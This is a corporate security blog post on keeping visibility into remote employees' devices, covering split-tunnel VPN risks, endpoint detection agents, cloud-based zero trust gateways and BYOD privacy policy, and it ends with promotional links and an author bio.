by Paul Caiazzo
Many organizations’ security monitoring infrastructure is based upon the assumption that most employees are connected directly to the corporate LAN. By collecting data from Active Directory domain controllers, the perimeter firewall, server, and workstation event logs, endpoint protection logs, and other key on-premises-based data sources an organization can maintain a high level of visibility into activity within their network.
However, employees are increasingly moving outside of the network perimeter, whether by using mobile devices or working from home or remote environment. While support for telework was growing steadily in recent years, the COVID-19 pandemic drove a sudden surge in work from home. As a result, many organizations have lost visibility into a large percentage of their business network traffic.
Cybercriminals have pounced on the chance to leverage the resulting distraction for their own gain by turning up the volume of their efforts. Bad actors have recently made news by stealing personal data from unemployment benefit applicants in several states, waging ongoing COVID-19-themed phishing campaigns, and creating a 238% surge in cyberattacks against banks.
With so much at stake, it’s important to establish ways of monitoring telework security in a world with disappearing network perimeters.
Related Reading: Gauging Risk Tolerance for Remote Workforce Security Versus Privacy
With a fully remote workforce, many organizations have been forced to make choices between usability and security. The existing virtual private network (VPN) infrastructure was not designed to support a fully remote workforce.
The adoption of split-tunnel VPNs has been widely recommended as a solution to the VPN scalability problem. However, while allowing Internet-bound traffic to flow directly to its destination, instead of over the corporate VPN, increases usability, it does so at the cost of security and network visibility.
Cybercriminals are capitalizing on this opportunity. The United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) recently issued a joint alert noting an increase in cyberattacks exploiting VPN vulnerabilities.
With un-monitored connections to the public Internet, a remote workforce's laptops can become compromised by malware or a cybercriminal without detection. These devices can then be used as a stepping stone to access the corporate environment via their VPN connection. For a remote workforce, employee devices and home networks are the new corporate network edge.
With the network perimeter shifted to teleworkers’ devices, securing the enterprise requires shifting security to these devices as well. Organizations require at least the same level of visibility into activity as they have on the corporate network.
By deploying agents onto the corporate-owned devices used by teleworkers, an organization can implement endpoint detection and response beyond the confines of the corporate network. This includes the ability to prevent and detect malware, viruses, ransomware, and other threats based upon signature analysis and behavioral analysis of potentially malicious processes.
However, an organization also requires centralized visibility into the devices of its remote workforce. For this purpose, a centrally managed cloud-based solution is the ideal choice. By moving security to the cloud, an enterprise reduces the load on the corporate network and VPN infrastructure, especially in a split-tunnel connectivity architecture. Cloud-based monitoring and threat management also can achieve a higher level of scalability and performance than an on-premises solution.
A cloud-based zero trust platform can also act as an access broker to resources both on the public internet and the corporate private network. Zero trust agents installed on telecommuters’ devices can securely and dynamically route all traffic to a cloud-based gateway and then on to the target resource in a way that provides the same or better control and visibility than even a well-configured traditional full tunnel VPN solution.
By uniquely identifying the use, device, and context, zero trusts provides fine-grained precision on access control for the enterprise. Data from the cloud-based ZTN gateway can additionally be used to perform behavioral analytics within a cloud-based SIEM platform, enhancing security visibility above and beyond traditional networking approaches.
Monitoring telework security can be a thorny issue for an organization from a privacy and security perspective. On the one side, an organization requires the ability to secure the sensitive data used by employees for daily work in order to meet regulatory requirements. However, deploying network monitoring solutions at employees’ homes presents significant privacy issues.
You can read about gauging privacy issues against risk appetite for your remote workforce here.
An agent-based solution, supported by cloud-based infrastructure, provides a workable solution to both issues. For corporate-owned devices, company policy should have explicit consent to monitor clause, which enables the organization to monitor activity on company devices. Agents installed on these devices enable an organization to exercise these rights without inappropriately monitoring employee network activity on personal devices connected to the same home network.
For personal devices used for remote work under a bring-your-own-device (BYOD) policy, the line between privacy and security becomes blurrier. Since devices are owned by the employee, it may seem more difficult to enforce the installation of the software agent, and these dual-use devices may cause inadvertent corporate monitoring of personal traffic. All organizations employing a BYOD model should document in policy the requirements for usage of personally owned devices, including cloud-based anti-malware and endpoint detection and response (EDR) tools as described earlier.
You can read more about writing policy and procedures for your new remote workforce here.
The most secure way to enable BYOD is a combination of corporately managed cloud-based anti-malware/EDR, supplemented by a ZTN architecture. In such a model, traffic bound for public internet resources can be passed along to the destination without interference, but malicious activity can still be detected and prevented.
Check out our webinar-on-demand, “Remote Workforce + Data Breach: A Perfect Storm”, to listen to legal, data privacy, and cybersecurity experts as they discuss how to adapt an Incident Response Plan for the remote workforce model so you can Show No Weakness.
Paul brings his wealth of cybersecurity experience to guide Avertium customers through challenging security problems while keeping business goals and objectives at the forefront. His primary focus is on business development, partner and client engagement, and other strategic initiatives.